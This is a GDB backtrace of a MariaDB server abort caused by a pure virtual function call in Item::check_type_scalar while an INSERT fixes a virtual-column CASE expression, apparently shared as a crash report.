#0  0x00007f9fe96e6808 in pthread\_kill () from /usr/lib/libpthread.so.0

#1  0x000055613803a06b in handle\_fatal\_signal (sig=<optimized out>) at /experiment/mariadb-server/sql/signal\_handler.cc:344

#2  <signal handler called>

#3  0x00007f9fe91c8d22 in raise () from /usr/lib/libc.so.6

#4  0x00007f9fe91b2862 in abort () from /usr/lib/libc.so.6

#5  0x00007f9fe9552802 in \_\_gnu\_cxx::\_\_verbose\_terminate\_handler () at /build/gcc/src/gcc/libstdc++-v3/libsupc++/vterminate.cc:95

#6  0x00007f9fe955ec8a in \_\_cxxabiv1::\_\_terminate (handler=<optimized out>) at /build/gcc/src/gcc/libstdc++-v3/libsupc++/eh\_terminate.cc:48

#7  0x00007f9fe955ecf7 in std::terminate () at /build/gcc/src/gcc/libstdc++-v3/libsupc++/eh\_terminate.cc:58

#8  0x00007f9fe955fa75 in \_\_cxxabiv1::\_\_cxa\_pure\_virtual () at /build/gcc/src/gcc/libstdc++-v3/libsupc++/pure.cc:50

#9  0x00005561380a4308 in Item::check\_type\_scalar (this=this@entry=0x629000089440, opname=...) at /experiment/mariadb-server/sql/item.cc:1121

#10 0x00005561381e2a5b in Item\_func::check\_argument\_types\_scalar (this=0x6190000a3ed8, start=<optimized out>, end=<optimized out>) at /experiment/mariadb-server/sql/item\_func.cc:271

#11 0x00005561381ce34e in Item\_func::fix\_fields (this=this@entry=0x6190000a3ed8, thd=<optimized out>, ref=<optimized out>) at /experiment/mariadb-server/sql/item\_func.cc:357

#12 0x0000556138100700 in Item\_func\_case::fix\_fields (this=0x6190000a3ed8, thd=<optimized out>, ref=<optimized out>) at /experiment/mariadb-server/sql/item\_cmpfunc.cc:3131

#13 0x0000556137be6ee2 in fix\_vcol\_expr (thd=<optimized out>, vcol=0x61d0000532b8) at /experiment/mariadb-server/sql/table.cc:3588

#14 0x000055613775e1ca in TABLE::fix\_vcol\_exprs (this=0x6190000a3298, thd=0x62b0000bd218) at /experiment/mariadb-server/sql/sql\_base.cc:5429

#15 0x000055613775ef93 in fix\_all\_session\_vcol\_exprs (tables=0x6290000873b8, thd=0x62b0000bd218) at /experiment/mariadb-server/sql/sql\_base.cc:5465

#16 lock\_tables (thd=thd@entry=0x62b0000bd218, tables=0x6290000873b8, count=<optimized out>, flags=flags@entry=0) at /experiment/mariadb-server/sql/sql\_base.cc:5649

#17 0x0000556137763800 in open\_and\_lock\_tables (thd=thd@entry=0x62b0000bd218, options=..., tables=<optimized out>, tables@entry=0x6290000873b8, derived=derived@entry=true, flags=flags@entry=0, prelocking\_strategy=prelocking\_strategy@entry=0x7f9fca4512d0) at /experiment/mariadb-server/sql/sql\_base.cc:5261

#18 0x0000556137819ef4 in open\_and\_lock\_tables (flags=0, derived=true, tables=0x6290000873b8, thd=0x62b0000bd218) at /experiment/mariadb-server/sql/sql\_base.h:509

#19 mysql\_insert (thd=thd@entry=0x62b0000bd218, table\_list=0x6290000873b8, fields=..., values\_list=..., update\_fields=..., update\_values=..., duplic=<optimized out>, ignore=<optimized out>, result=<optimized out>) at /experiment/mariadb-server/sql/sql\_insert.cc:757

#20 0x00005561378d2bb8 in mysql\_execute\_command (thd=0x62b0000bd218, is\_called\_from\_prepared\_stmt=<optimized out>) at /experiment/mariadb-server/sql/sql\_parse.cc:4565

#21 0x00005561378df5a1 in mysql\_parse (thd=0x62b0000bd218, rawbuf=<optimized out>, length=<optimized out>, parser\_state=<optimized out>) at /experiment/mariadb-server/sql/sql\_parse.cc:8030

#22 0x00005561378e560c in dispatch\_command (command=<optimized out>, thd=0x62b0000bd218, packet=<optimized out>, packet\_length=<optimized out>, blocking=<optimized out>) at /experiment/mariadb-server/sql/sql\_parse.cc:1896

#23 0x00005561378ea73d in do\_command (thd=0x62b0000bd218, blocking=blocking@entry=true) at /experiment/mariadb-server/sql/sql\_parse.cc:1404

#24 0x0000556137ca5e57 in do\_handle\_one\_connection (connect=<optimized out>, put\_in\_cache=<optimized out>) at /experiment/mariadb-server/sql/sql\_connect.cc:1418

#25 0x0000556137ca633d in handle\_one\_connection (arg=arg@entry=0x6080000023b8) at /experiment/mariadb-server/sql/sql\_connect.cc:1312

#26 0x0000556138736c2c in pfs\_spawn\_thread (arg=0x617000005f18) at /experiment/mariadb-server/storage/perfschema/pfs.cc:2201

#27 0x00007f9fe96df259 in start\_thread () from /usr/lib/libpthread.so.0

#28 0x00007f9fe928a5e3 in clone () from /usr/lib/libc.so.6

Tag

#sql